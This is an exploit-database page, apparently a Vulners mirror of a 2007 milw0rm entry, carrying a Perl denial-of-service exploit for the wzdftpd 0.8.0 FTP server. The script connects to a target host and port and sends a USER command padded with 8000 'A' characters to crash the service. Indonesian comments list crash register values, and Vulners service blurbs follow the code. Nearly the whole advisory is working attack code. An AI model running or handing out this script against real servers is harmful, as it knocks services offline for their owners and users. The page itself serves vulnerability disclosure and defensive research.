Lucene search
K

wzdftpd <= 0.8.0 (USER) Remote Denial of Service Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

wzdftpd <= 0.8.0 (USER) Remote DoS Exploit Indonesian Security Advisor

Code

                                                # Indonesian Newhack Security Advisory
# ------------------------------------
# wzdftpd &#60;= 0.8.0 (USER) Remote Danial of Service
# Waktu            :  Oct 07 2007 05:00AM
# Software        :  wzdftpd 0.8.0
# Version        :  0.8.0 Linux and Windows
# Vendor        :  http://www.wzdftpd.net/
# Ditemukan oleh    :  k1tk4t  |  http://newhack.org
# Lokasi        :  Indonesia
#
# Tested on Windows XP SP2 and Linux CentOS
#
# C0000005 (ACCESS VIOLATION)
#
# EAX 00000001
# ECX 00A2F410
# EDX 003E0608
# EBX 00000000
# ESP 00FDEB58
# EBP 00FDFFEC
# ESI 00A25118
# EDI 00000094
#
#
#
#  Terima Kasih untuk;
#  str0ke, DNX, xoron
#  -[opt1lc, fl3xu5, ghoz]-
#  nyubi,iFX,kin9k0ng,bius,selikoer,aldy_BT,NoGe
#  Komunitas Security dan Hacker Indonesia
#
#!/usr/bin/perl
use IO::Socket;

print &#34;\n  |-------------------------------------------------|&#34;;
print &#34;\n  |         Indonesian Newhack Technology           |&#34;;
print &#34;\n  |-------------------------------------------------|&#34;;
print &#34;\n  |  wzdftpd 0.8.0 (USER) Remote Danial of Service  |&#34;;
print &#34;\n  |     Found by k1tk4t [k1tk4t(at)newhack.org]     |&#34;;
print &#34;\n  |-------------------------------------------------|&#34;;
print &#34;\n  |&#34;;

if (@ARGV &#60; 2)
{
 print &#34;\n[!] Penggunaan: perl wzdftpd0.8.0.pl [Host] [Port] &#34;;
print &#34;\n[!] Contoh: perl wzdftpd0.8.0.pl 127.0.0.1 21&#34;;
 exit;
}


$ip = $ARGV[0];
$port = $ARGV[1];

$exploit = &#34;A&#34; x 8000;

$socket = IO::Socket::INET-&#62;new( Proto =&#62; &#34;tcp&#34;, PeerAddr =&#62; &#34;$ip&#34;, PeerPort =&#62; &#34;$port&#34;) || die &#34;\n[-] Koneksi: Gagal!\n&#34;;
print &#34;\n[+] Koneksi: Ok!\n&#34;;
print &#34;[+] Menggirim Packet DoS...\n&#34;;

print $socket &#34;USER $exploit\n&#34;;
sleep(5);
close($socket);

print &#34;[?] Mati Sudah!\n&#34;;

# milw0rm.com [2007-10-07]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
17